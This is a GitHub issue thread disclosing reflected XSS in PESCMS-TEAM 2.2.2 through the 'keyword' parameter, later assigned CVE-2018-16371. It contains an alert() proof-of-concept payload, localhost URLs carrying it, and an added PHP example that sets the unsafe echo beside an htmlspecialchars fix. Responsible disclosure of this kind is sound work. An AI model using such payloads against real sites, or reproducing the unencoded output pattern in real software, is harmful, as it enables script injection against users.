lazyphp / PESCMS-TEAM

The open source task management system
GNU General Public License v2.0

PESCMS-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerabilities #3

Closed snappyJack closed 5 years ago

snappyJack commented 6 years ago

I found multiple reflected cross site scripting vulnerabilities where the page uses Model_index.php; we can see there is no XSS filter on the "keyword" parameter. Now I input the payload `aa"><img src=x onerror=alert(1)>`. The full URL is: http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

and the code is running.

and there are lots of pages that use Model_index.php, and they all have the reflected cross site scripting vulnerability. Like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

.. .. ..
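The defect described in the report is the search keyword being reflected into the page without output encoding. The following is an added example (not PESCMS-TEAM's own code; the template markup and function names are assumed) showing that pattern beside the hardened form, using the reporter's payload as constructed input:

```php
<?php
// Added example, not code from PESCMS-TEAM. The surrounding template
// (a search box whose value attribute echoes the "keyword" parameter)
// is an assumption about how Model_index.php renders the keyword.

// Constructed input: the payload from the report, as it would arrive in
// $_GET['keyword'] after URL decoding.
$keyword = 'aa"><img src=x onerror=alert(1)>';

// Vulnerable pattern: the raw parameter is concatenated into an HTML
// attribute, so the embedded '">' terminates the attribute and the rest
// of the input is parsed as markup by the browser.
function renderSearchBoxUnsafe(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// Hardened form: encode for the HTML attribute context before output.
// ENT_QUOTES encodes both single and double quotes, ENT_SUBSTITUTE keeps
// invalid UTF-8 from turning the whole output into an empty string, and
// ENT_HTML5 selects the HTML5 entity table.
function renderSearchBoxSafe(string $keyword): string
{
    $safe = htmlspecialchars($keyword, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="keyword" value="' . $safe . '">';
}

// Side by side: the unsafe output contains a live <img> element, the safe
// output contains only the encoded text inside the attribute.
echo renderSearchBoxUnsafe($keyword), PHP_EOL;
echo renderSearchBoxSafe($keyword), PHP_EOL;

// Because many controllers share Model_index.php, the encoding belongs in
// the shared rendering path rather than in each controller separately.
```

Since the same shared code is reached from User, User_group, Department, Bulletin and the other listed modules, applying the encoding once in the shared output path covers all of the reported URLs.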

lazyphp commented 6 years ago

Thank you, I will fix this problem.

lazyphp commented 5 years ago

The upcoming release is already close to resolving this issue. https://github.com/lazyphp/PESCMS-TEAM/tree/dev-2.3.0

NicoleG25 commented 4 years ago

@lazyphp Has the issue been resolved? Please note that CVE-2018-16371 has been assigned.